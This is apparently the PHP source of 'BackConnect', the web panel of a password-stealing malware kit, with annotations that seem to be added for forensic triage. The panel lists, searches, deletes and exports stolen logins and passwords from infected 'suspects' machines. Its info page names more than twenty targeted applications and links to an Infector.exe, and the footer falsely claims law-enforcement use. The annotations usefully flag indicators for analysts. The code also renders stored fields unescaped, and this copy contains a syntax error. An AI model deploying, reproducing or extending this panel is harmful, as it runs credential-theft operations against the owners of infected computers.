  1. <?php
  2.  
  3. include 'config.php';
  4.  
  5. // ********************************************************************************************
  6.  
// Page templates. Every action in this file builds its response as
// $html . <page title> . $header . <body> . $footer.
// The literal strings below (the "BC Log Manager - " title prefix, the navigation links and the
// footer line) are sent unchanged on each authenticated page, so they are stable content
// signatures for recognising this panel in captured traffic or on a seized host.
$html = "<html><head><title>BC Log Manager - ";
// $username is not assigned anywhere in this file; presumably config.php defines it (confirm).
$header = "</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>
<div id='web'><div id='header'><b>Jak se máš ".$username."?</b></div><div id='navigation'><ul>
<li><a href='?action=logs'>All Logs</a></li><li><a href='?action=search'>Search</a></li>
<li><a href='?action=suspects'>Suspects</a></li>
<li><a href='?action=export'>Export</a></li>
<li><a href='?action=info'>Information</a></li>
<li><a href='?action=logout'>Logout</a></li>
</ul></div><br>";
$footer = "<div id='footer'>(C) 2010 - FOR LAW ENFORCEMENTS ONLY. United States law applies.</div></div></body></html>";
// Built at load time on every request: the submitted search text is echoed back into the
// form through htmlspecialchars(). The option values 1..6 are later used as indexes into $cols.
$searchform = "<form name='search' method='POST' action='?action=search'>
Search for: <input type='text' name='q' size='20' value='".htmlspecialchars($_POST["q"])."'> In: <select name='in'>
<option value='1' selected='selected'>Url</option><option value='2'>Username</option>
<option value='3'>Password</option><option value='4'>Computer ID</option>
<option value='5'>Date</option><option value='6'>IP</option></select>
<input type='submit' value='Search' name='search'></form>";
// Two halves of the export form; the export action appends its <option> list between them.
$exportform1 = "<form name='search' method='POST' action='?action=export'><select name='in'>";
$exportform2 = "</select> <input type='submit' value='Export' name='Export'></form>";
// Login form posted to ?action=login with the fields "username" and "password".
$loginform = "<form id='loginform' name='frm' method='POST' action='?action=login'>
<table id='logintable' cellpadding='2' cellspacing='0' border='0'>
<tr><td>Username:</td><td><input type='text' name='username' size='20'></td></tr>
<tr><td>Password:</td><td><input type='password' name='password' size='20'></td></tr>
<tr><td></td><td><input type='submit' value='Login' name='login'></td></tr></form>";
// Client-side helpers for the result tables: select-all for the sel1[] / sel2[] checkboxes and
// confirmation prompts before the "Delete Selected" / "Export Evidence" submits.
$javascript = "<script language='javascript' type='text/javascript'>
function CheckElements1() { chk = document.getElementsByName('sel1[]');
for (i = 0; i<chk.length; i++) { if (document.frm.elements['check_sel1'].checked) chk[i].checked = true; else chk[i].checked = false;}}
function CheckElements2() { chk = document.getElementsByName('sel2[]');
for (i = 0; i<chk.length; i++) { if (document.frm.elements['check_sel2'].checked) chk[i].checked = true; else chk[i].checked = false;}}
function ConfirmElements1() { chk = document.getElementsByName('sel1[]');
for (i = 0; i<chk.length; i++) { if (chk[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?');}}
alert('At least one option must be select.'); return false;}
function ConfirmElements2() { chk = document.getElementsByName('sel2[]');
for (i = 0; i<chk.length; i++) { if (chk[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?');}}
alert('At least one option must be select.'); return false;}
function ConfirmElements12() {
chk1 = document.getElementsByName('sel1[]');
chk2 = document.getElementsByName('sel2[]');
for (i = 0; i<chk1.length; i++) { if (chk1[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?'); }}
for (i = 0; i<chk2.length; i++) { if (chk2[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?'); }}
alert('At least one option must be select.'); return false;
}
function ConfirmElements12Evidence() {
chk1 = document.getElementsByName('sel1[]');
chk2 = document.getElementsByName('sel2[]');
for (i = 0; i<chk1.length; i++) { if (chk1[i].checked == true) { return true; }}
for (i = 0; i<chk2.length; i++) { if (chk2[i].checked == true) { return true; }}
alert('At least one option must be select.'); return false;
}
</script>";
// Column names of the `logs` table, indexed by the sort parameter (0..6) and by the search
// form's "in" value (1..6). For forensic triage this is the credential record layout:
// source program id, URL, login, password, computer id, date, IP.
$cols = array("program", "url", "login", "pass", "compid", "date", "ip");
// Column names of the `suspects` table (one row per reporting machine), indexed by the
// suspects page's sort parameter (0..7).
$cols2 = array("compid", "os", "computer", "user", "install", "date", "ip", "country");
  58.  
  59. // FUNCTIONS ******************************************************************************
  60. function connect_database() {
  61. global $dbHost, $dbUser, $dbPass, $dbDatabase, $html, $header, $footer;
  62. $mysql = mysql_connect($dbHost, $dbUser, $dbPass);
  63. if (!$mysql) {
  64. $html .= "Database Error".$header."Can not connect to database, please check the configuration.".$footer;
  65. die($html);
  66. }
  67. if (!mysql_select_db($dbDatabase, $mysql)) {
  68. mysql_close($mysql);
  69. $html .= "Database Error".$header."Can not select '".$dbDatabase."' database, please check the configuration.".$footer;
  70. die($html);
  71. }
  72. return $mysql;
  73. }
  74. function pages_number($logstotal, $logspage, $page, $site) {
  75. $pagesnumber = ceil($logstotal/$logspage);
  76. $temp = "Pages: ";
  77. for ($i=0; $i<$pagesnumber; $i++) {
  78. if ($_SESSION[$page] == $i)
  79. $temp .= " <span class='page1'>".$i."</span>";
  80. else
  81. $temp .= " <span class='page0'><a href='?action=".$site."&".$page."=".$i."'>".$i."</a></span>";
  82. }
  83. $temp .= " Results ".($_SESSION[$page]*$logspage)." - ".(($_SESSION[$page]*$logspage)+$logspage)." of about ".$logstotal;
  84. return $temp;
  85. }
  86. function sort_order() {
  87. if ($_SESSION["order"] == 0) $tmp = "ASC"; else $tmp = "DESC";
  88. return $tmp;
  89. }
  90.  
  91. // LOGIN **************************************************************************************
// Access gate for every request: the rest of the file runs only when the session already
// holds the configured user name and the client address recorded at login.
session_start();
if ($_SESSION["user"]!=$username || $_SESSION["ip"]!=$_SERVER["REMOTE_ADDR"]) {
    if ($_GET["action"] == "login") {
        // $username / $password are not assigned in this file; presumably config.php defines
        // them (confirm). The submitted values are compared to them directly with ==.
        if (isset($_POST["username"]) && isset($_POST["password"]) && $username==$_POST["username"] && $password==$_POST["password"]) {
            session_start();
            // Session state: identity, bound client address, and the default sort / paging
            // values read by the logs and suspects pages.
            $_SESSION["user"] = $username;
            $_SESSION["ip"] = $_SERVER["REMOTE_ADDR"];
            $_SESSION["sort"] = 5;
            $_SESSION["sort2"] = 5;
            $_SESSION["order"] = 1;
            $_SESSION["page"] = 0;
            $_SESSION["page2"] = 0;

            // Schema probe: both tables must answer a COUNT(*), otherwise an error page is
            // shown. The table names `logs` and `suspects` are what to look for in a
            // recovered database.
            $mysql = connect_database();
            $result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
            if (!$result) {
                $html .= "Database Error".$header."Table 'logs' not present, please run the installation script first.".$footer;
                die($html);
            }
            $result = mysql_query("SELECT COUNT(*) FROM `suspects`;", $mysql);
            if (!$result) {
                $html .= "Database Error".$header."Table 'suspects' not present, please run the installation script first.".$footer;
                die($html);
            }
            mysql_close($mysql);
            // No exit follows the redirect header, so execution continues into the action
            // dispatch further down with action still set to "login".
            header("Location: ?action=logs");
        } else {
            // Wrong or missing credentials: login form again, titled "Login Error".
            $html = "<html><head><title>Login Error</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
            echo $html;
            exit;
        }
    } else {
        // Any other unauthenticated request gets the plain login form and nothing else.
        $html = "<html><head><title>Login</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
        echo $html;
        exit;
    }
}
  129.  
  130. // LOGOUT ************************************************************************************
// Action dispatch for an authenticated session. The action query parameter selects one of:
// logout, logs (default), search, selected, suspects, export, info.
// $logspage, $aplications, $installation, $InstallCodeRestart and $ApplicationCount are used
// below but never assigned in this file; presumably config.php defines them (confirm).
if ($_GET["action"] == "logout") {
    unset($_SESSION["user"]);
    unset($_SESSION["ip"]);
    unset($_SESSION["sort"]);
    unset($_SESSION["sort2"]);
    unset($_SESSION["order"]);
    unset($_SESSION["page"]);
    unset($_SESSION["page2"]);
    session_unset();
    header("Location: index.php");

// LOGS **************************************************************************************
// Paged listing of the `logs` table (captured credentials). Rows with program id 14 are
// left out of this view.
} elseif ($_GET["action"] == "logs" || !isset($_GET["action"])) {

    // Clicking the active sort column toggles the direction; another column replaces it.
    if (isset($_GET["sort"]) && $_GET["sort"]>=0 && $_GET["sort"]<=6) {
        if ($_SESSION["sort"] == $_GET["sort"])
            if ($_SESSION["order"] == 0) $_SESSION["order"] = 1; else $_SESSION["order"] = 0; else $_SESSION["sort"] = $_GET["sort"];
    }

    $mysql = connect_database();
    $result = mysql_query("SELECT COUNT(*) FROM `logs` WHERE `program` != 14 ;", $mysql);
    $logstotal = mysql_result($result, 0);
    if ($logstotal > 0) {
        if (isset($_GET["page"]) && is_numeric($_GET["page"]) && $_GET["page"]>=0 && $_GET["page"]<=ceil($logstotal/$logspage))
            $_SESSION["page"] = $_GET["page"];

        // The ORDER BY column comes from the fixed $cols list, not from the request text.
        $result = mysql_query("SELECT * FROM `logs` WHERE `program` != 14 ORDER BY `".$cols[$_SESSION["sort"]]."` ".sort_order()." LIMIT ".($logspage*$_SESSION["page"])." , ".$logspage.";", $mysql);
        if (!$result) die(mysql_error());

        $html .= "Logs".$header.$javascript."
<form name='frm' method='POST' action='?action=selected'>
<table id='logstable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
<td><a href='?action=logs&sort=0'>Program</a></td><td><a href='?action=logs&sort=1'>Url</a></td>
<td><a href='?action=logs&sort=2'>Username</a></td><td><a href='?action=logs&sort=3'>Password</a></td>
<td><a href='?action=logs&sort=4'>Computer ID</a></td><td><a href='?action=logs&sort=5'>Date</a></td>
<td><a href='?action=logs&sort=6'>IP</a></td>
<td><input type='checkbox' name='check_sel1' onClick='CheckElements1();'></td></tr>";
        $i = 0;
        // Stored row fields are concatenated into the page exactly as they sit in the
        // database. Analysts browsing a recovered copy should do so in an isolated environment.
        while ($row = mysql_fetch_array($result)) {
            if ($row["program"] != 14) { // do not display key info here
                $html .= "<tr class='";
                if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
                $html .= "'><td>".$aplications[$row["program"]]."</td>";
                $html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
                $html .= "<td><a href='?action=search&q=".$row["compid"]."'>".$row["compid"]."</a></td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
                $html .= "<td><input type='checkbox' name='sel1[]' value='".$row["id"]."'></td></tr>";
                $i++;
            }
        }
        $html .= "</table><div id='pages'><div id='numbers'>".pages_number($logstotal, $logspage, "page", "logs").
            "</div><input id='delete' name='buttonact' type='submit' value='Delete Selected' onclick='if (!ConfirmElements1()) return false;'></div></form>".$footer;
    } else {
        $html .= "Logs".$header."No logs found!".$footer;
    }
    mysql_close($mysql);
    echo $html;

// SEARCH ************************************************************************************
// Search over `logs`; when the field is the computer id (in == 4) the matching `suspects`
// rows are shown as well, giving the per-machine view.
} elseif ($_GET["action"] == "search") {
    if (isset($_GET["q"])) { $_POST["q"] = $_GET["q"]; $_POST["in"] = 4; /* for suspect-search link */ }
    if (isset($_POST["q"]) && isset($_POST["in"]) && is_numeric($_POST["in"]) && $_POST["in"]>0 && $_POST["in"]<=6) {
        $mysql = connect_database();

        // list detailed info of suspect (if comp-id is given)
        if ($_POST["in"] == 4)
        {
            // Exact match on the computer id in both tables; the search text goes through
            // mysql_real_escape_string() before being placed in the quoted literal.
            $result1 = mysql_query("SELECT * FROM `logs` WHERE `".mysql_real_escape_string($cols[$_POST["in"]], $mysql)."` = '".mysql_real_escape_string($_POST["q"], $mysql)."';", $mysql);
            $result2 = mysql_query("SELECT * FROM `suspects` WHERE ".mysql_real_escape_string($cols[$_POST["in"]], $mysql)." = '".mysql_real_escape_string($_POST["q"], $mysql)."' ORDER BY date ASC;", $mysql);
            if (!$result1 || !$result2) die(mysql_error());
            if (mysql_num_rows($result1) == 0 && mysql_num_rows($result2) == 0)
            {
                $html .= "Search".$header.$searchform."<br>No results found!";
                die($html);
            }
        }

        // otherwise normal search in logs table
        else
        {
            // Substring (LIKE %...%) match on the chosen `logs` column.
            $result1 = mysql_query("SELECT * FROM `logs` WHERE `".mysql_real_escape_string($cols[$_POST["in"]], $mysql)."` LIKE '%".mysql_real_escape_string($_POST["q"], $mysql)."%';", $mysql);
            if (!$result1) die(mysql_error());
            if (mysql_num_rows($result1) == 0)
            {
                $html .= "Search".$header.$searchform."<br>No results found!";
                die($html);
            }
        }

        $html .= "Search".$header.$javascript.$searchform."<form name='frm' method='POST' action='?action=selected'>";

        // display the suspects table
        if ($_POST["in"] == 4 && mysql_num_rows($result2) > 0) {
            $html .= "
<table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
<td>Computer ID</td><td>OS</td>
<td>Computer</td><td>User</td>
<td>Installation</td><td>Date</td>
<td>IP</td><td>Country</td>
<td><input type='checkbox' name='check_sel2' onClick='CheckElements2();'>".
                "<input type='hidden' name='in' value='".htmlspecialchars($_POST["in"])."'>".
                "<input type='hidden' name='q' value='".htmlspecialchars($_POST["q"])."'>".
                "</td></tr>";
            $i = 0;
            while ($row = mysql_fetch_array($result2)) {
                $html .= "<tr class='";
                if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
                $html .= "'><td>".$row["compid"]."</td><td>".$row["os"]."</td><td>".$row["computer"]."</td><td>".$row["user"]."</td>";
                $html .= "<td>".$installation[$row["install"]]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td><td>".$row["country"]."</td>";
                $html .= "<td><input type='checkbox' name='sel2[]' value='".$row["id"]."'></td></tr>";
                $i++;
            }
            $html .= "</table><br>";
        }

        // display the log table
        if (mysql_num_rows($result1) > 0) {
            $html .= "
<table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
<td>Program</td><td>Url</td>
<td>Username</td><td>Password</td>
<td>Computer ID</td><td>Date</td>
<td>IP</td>
<td><input type='checkbox' name='check_sel1' onClick='CheckElements1();'>".
                "<input type='hidden' name='in' value='".htmlspecialchars($_POST["in"])."'>".
                "<input type='hidden' name='q' value='".htmlspecialchars($_POST["q"])."'>".
                "</td></tr>";
            $i = 0;
            while ($row = mysql_fetch_array($result1)) {
                $html .= "<tr class='";
                if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
                $html .= "'><td>".$aplications[$row["program"]]."</td>";
                $html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
                $html .= "<td>".$row["compid"]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
                $html .= "<td><input type='checkbox' name='sel1[]' value='".$row["id"]."'></td></tr>";
                $i++;
            }
            $html .= "</table>";
        }

        // page numbers and delete button
        $html .= "<div id='pages'><div id='numbers'>".mysql_num_rows($result1)." results for '".$_POST["q"]."'</div><div id='delete'>".
            "<input name='buttonact' type='submit' value='Export Evidence' onclick='if (!ConfirmElements12Evidence()) return false;'>&nbsp;".
            "<input name='buttonact' type='submit' value='Delete Selected' onclick='if (!ConfirmElements12()) return false;'>".
            "</div></div></form>";

        $html .= $footer;
        mysql_close($mysql);
    } else {
        $html .= "Logs".$header.$searchform.$footer;
    }
    echo $html;

// SELECTED **************************************************************************************
// Target of the result-table forms. The submit button's value ("Delete Selected" or
// "Export Evidence") chooses the operation; sel1[] holds `logs` ids, sel2[] `suspects` ids.
} elseif ($_GET["action"] == "selected") {
    if (isset($_POST["buttonact"])) {

        // DELETE SELECTED ***********************************************************************
        if ($_POST["buttonact"] == "Delete Selected") {

            // delete entries from logs table (selection 1)
            if (isset($_POST["sel1"]) && count($_POST["sel1"])!=0) {
                $mysql = connect_database();
                // Builds "`id` = a OR `id` = b ..." from the entries that pass is_numeric();
                // the trailing " OR" is removed by the str_replace() below.
                $query = "DELETE FROM `logs` WHERE";
                for ($i=0; $i<count($_POST["sel1"]); $i++) {
                    if (is_numeric($_POST["sel1"][$i]))
                        $query .= " `id` = ".mysql_real_escape_string($_POST["sel1"][$i], $mysql)." OR";
                }
                $query .= ';';
                $query = str_replace(' OR;', ';', $query);
                $result = mysql_query($query, $mysql);
                if (!$result) die(mysql_error());
                mysql_close($mysql);
            }

            // delete entries from suspects table (selection 2)
            if (isset($_POST["sel2"]) && count($_POST["sel2"])!=0) {
                $mysql = connect_database();
                $query = "DELETE FROM `suspects` WHERE";
                for ($i=0; $i<count($_POST["sel2"]); $i++) {
                    if (is_numeric($_POST["sel2"][$i]))
                        $query .= " `id` = ".mysql_real_escape_string($_POST["sel2"][$i], $mysql)." OR";
                }
                $query .= ';';
                $query = str_replace(' OR;', ';', $query);
                $result = mysql_query($query, $mysql);
                if (!$result) die(mysql_error());
                mysql_close($mysql);
            }

            // NOTE(review): as pasted, the first `if` below has no statement before `elseif`,
            // which PHP rejects as a syntax error. A line (presumably the redirect back to
            // the search page) appears to be missing from this copy.
            if (isset($_POST["q"]) && isset($_POST["in"])) // return to search, suspects or logs
            elseif (isset($_POST["sel2"]) && count($_POST["sel2"])!=0)
                header("Location: ?action=suspects");
            else
                header("Location: ?action=logs");

        // EXPORT SELECTED ***********************************************************************
        // Plain-text download of the selected rows. The report banner names the kit in its
        // own words, which makes exported files easy to recognise during triage.
        } elseif ($_POST["buttonact"] == "Export Evidence" && isset($_POST["q"])) {
            header("Content-Type: text/plain");
            // The q request value becomes part of the download file name.
            header("Content-Disposition: Attachment; filename=evidence ".$_POST["q"].".txt");
            header("Pragma: no-cache");

            echo "\r\n BackConnect Password and Information Stealer\r\n Evidence Report\r\n ================================================\r\n";

            // logs table
            if (isset($_POST["sel1"]) && count($_POST["sel1"])!=0) {
                $mysql = connect_database();
                // Only entries that pass is_numeric() are added to the id list.
                $query = "SELECT * FROM `logs` WHERE";
                for ($i=0; $i<count($_POST["sel1"]); $i++) {
                    if (is_numeric($_POST["sel1"][$i]))
                        $query .= " `id` = ".$_POST["sel1"][$i]." OR";
                }
                $query .= ';';
                $query = str_replace(' OR;', ';', $query);
                $result = mysql_query($query, $mysql);
                if (!$result) die(mysql_error());
                echo "\r\n\r\n";
                // One labelled record per credential row, separated by a dashed line.
                while ($row = mysql_fetch_array($result)) {
                    echo "Program: ".$aplications[$row['program']]."\r\n";
                    echo "Url/Host: ".$row['url']."\r\n";
                    echo "Login: ".$row['login']."\r\n";
                    echo "Password: ".$row['pass']."\r\n";
                    echo "Computer ID: ".$row['compid']."\r\n";
                    echo "Date: ".$row['date']."\r\n";
                    echo "IP: ".$row['ip']."\r\n";
                    echo "----------------------------------------------------------\r\n";
                }
                mysql_close($mysql);
            }

            // suspects table
            if (isset($_POST["sel2"]) && count($_POST["sel2"])!=0) {
                $mysql = connect_database();
                $query = "SELECT * FROM `suspects` WHERE";
                for ($i=0; $i<count($_POST["sel2"]); $i++) {
                    if (is_numeric($_POST["sel2"][$i]))
                        $query .= " `id` = ".$_POST["sel2"][$i]." OR";
                }
                $query .= ';';
                $query = str_replace(' OR;', ';', $query);
                $result = mysql_query($query, $mysql);
                if (!$result) die(mysql_error());
                echo "\r\n\r\n";
                // Machine records; this export also prints a `host` column that the HTML
                // tables do not show.
                while ($row = mysql_fetch_array($result)) {
                    echo "Computer ID: ".$row['compid']."\r\n";
                    echo "OS: ".$row['os']."\r\n";
                    echo "Computer: ".$row['computer']."\r\n";
                    echo "User: ".$row['user']."\r\n";
                    echo "Installation: ".$installation[$row["install"]]."\r\n";
                    echo "Date: ".$row['date']."\r\n";
                    echo "IP: ".$row['ip']."\r\n";
                    echo "Country: ".$row['country']."\r\n";
                    echo "Host: ".$row['host']."\r\n";
                    echo "----------------------------------------------------------\r\n";
                }
                mysql_close($mysql);
            }

        }

    }

// SUSPECTS **********************************************************************************
// Paged listing of the `suspects` table (one row per reporting machine). Rows whose
// install value equals $InstallCodeRestart are left out.
} elseif ($_GET["action"] == "suspects") {

    if (isset($_GET["sort"]) && $_GET["sort"]>=0 && $_GET["sort"]<=7) {
        if ($_SESSION["sort2"] == $_GET["sort"])
            if ($_SESSION["order"] == 0) $_SESSION["order"] = 1; else $_SESSION["order"] = 0; else $_SESSION["sort2"] = $_GET["sort"];
    }

    $mysql = connect_database();
    $result = mysql_query("SELECT COUNT(*) FROM suspects WHERE install <> ".$InstallCodeRestart.";", $mysql);
    $logstotal = mysql_result($result, 0);
    if ($logstotal > 0) {
        if (isset($_GET["page2"]) && is_numeric($_GET["page2"]) && $_GET["page2"]>=0 && $_GET["page2"]<=ceil($logstotal/$logspage))
            $_SESSION["page2"] = $_GET["page2"];

        // The ORDER BY column comes from the fixed $cols2 list.
        $result = mysql_query("SELECT * FROM suspects WHERE install <> ".$InstallCodeRestart." ORDER BY ".$cols2[$_SESSION["sort2"]]." ".sort_order()." LIMIT ".($logspage*$_SESSION["page2"])." , ".$logspage.";", $mysql);
        if (!$result) die(mysql_error());

        $html .= "Suspects".$header.$javascript."
<form name='frm' method='POST' action='?action=selected'>
<table id='logstable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
<td><a href='?action=suspects&sort=0'>Computer ID</a></td><td><a href='?action=suspects&sort=1'>OS</a></td>
<td><a href='?action=suspects&sort=2'>Computer</a></td><td><a href='?action=suspects&sort=3'>User</a></td>
<td><a href='?action=suspects&sort=4'>Installation</a></td><td><a href='?action=suspects&sort=5'>Date</a></td>
<td><a href='?action=suspects&sort=6'>IP</a></td><td><a href='?action=suspects&sort=7'>Country</a></td>
<td><input type='checkbox' name='check_sel2' onClick='CheckElements2();'></td></tr>";
        $i = 0;
        // Each computer id links to the search action, which shows that machine's rows
        // from both tables.
        while ($row = mysql_fetch_array($result)) {
            $html .= "<tr class='";
            if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
            $html .= "'><td><a href='?action=search&q=".$row["compid"]."'>".$row["compid"]."</a></td><td>".$row["os"]."</td><td>".$row["computer"]."</td><td>".$row["user"]."</td>";
            $html .= "<td>".$installation[$row["install"]]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td><td>".$row["country"]."</td>";
            $html .= "<td><input type='checkbox' name='sel2[]' value='".$row["id"]."'></td></tr>";
            $i++;
        }
        $html .= "</table><div id='pages'><div id='numbers'>".pages_number($logstotal, $logspage, "page2", "suspects")."</div>".
            "<input id='delete' name='buttonact' type='submit' value='Delete Selected' onclick='if (!ConfirmElements2()) return false;'></div></form>".$footer;
    } else {
        $html .= "Suspects".$header."No suspects found!".$footer;
    }
    mysql_close($mysql);
    echo $html;

// EXPORT ************************************************************************************
// Bulk export of every `logs` row for one program id as a text download named
// "log <program name>.txt". Without a valid "in" value the selection form is shown instead.
} elseif ($_GET["action"] == "export") {

    if (isset($_POST["in"]) && is_numeric($_POST["in"]) && $_POST["in"] < $ApplicationCount) {
        $mysql = connect_database();
        $query = "SELECT * FROM `logs` WHERE `program` =".mysql_real_escape_string($_POST["in"], $mysql).";";
        $result = mysql_query($query, $mysql);
        if (!$result) die(mysql_error());
        header("Content-Type: text/plain");
        header("Content-Disposition: Attachment; filename=log ".$aplications[$_POST["in"]].".txt");
        header("Pragma: no-cache");
        while ($row = mysql_fetch_array($result)) {
            echo "Program: ".$aplications[$row['program']]."\r\n";
            echo "Url/Host: ".$row['url']."\r\n";
            echo "Login: ".$row['login']."\r\n";
            echo "Password: ".$row['pass']."\r\n";
            echo "Computer ID: ".$row['compid']."\r\n";
            echo "Date: ".$row['date']."\r\n";
            echo "IP: ".$row['ip']."\r\n";
            echo "----------------------------------------------------------\r\n";
        }
        mysql_close($mysql);
        // The connection is reopened and closed again with nothing in between.
        $mysql = connect_database();

        mysql_close($mysql);
    } else {
        // One <option> per program id from 0 up to $ApplicationCount - 1.
        for ($i = 0; $i < $ApplicationCount; $i++)
            $exportform1 .= "<option value='".$i."'>".$aplications[$i]."</option>";
        $html .= "Logs".$header.$exportform1.$exportform2.$footer;
        echo $html;
    }

// INFORMATION **********************************************************************************
// Static "about" page. Its text is the kit's own description: the version string, the
// list of applications it says it collects credentials from, and two fixed download paths
// under /downloads/. All of these are usable as triage indicators.
} elseif ($_GET["action"] == "info") {

    $html .= "Information".$header;
    $html .= "Version: 1.3<br>Date: -<br><br>This is BackConnect. ".
        "For any questions and upgrades, please contact -. This copy is registered to: - Click on a computer id to show the complete collected evidence.<br><br>".
        "It steals following information:<br>* MSN<br>* Google Talk<br>* Trillian<br>* Pidgin<br>".
        "* Paltalk<br>* Steam<br>* No-IP<br>* DynDNS<br>* Firefox (all versions)<br>* Internet Explorer (unreliable)<br>".
        "* FileZilla<br>* FlashFXP<br>* Keys from various games and software<br>* Outlook (old versions)<br>* IMVU<br>* Internet Download Manager<br>* Chrome (< 2010)".
        "<br>* RapidShare Downloader<br>* SmartFTP<br>* CoreFTP<br>* FTP Commander<br>* Total Commander<br>* Protected Storage<br><br>".
        "For further information and legal information please read the readme.<br><br>".
        "<a href='/downloads/Infector.exe'>Link to your Infector.exe</a><br><a href='/downloads/Disinfector.exe'>Link to your Disinfector.exe</a><br><br>";
    $html .= $footer;
    echo $html;

// Unknown ***********************************************************************************
// Any other action value renders the frame (header and footer) with an empty body.
} else {
    $html .= $header.$footer;
    echo $html;
}
  487. ?>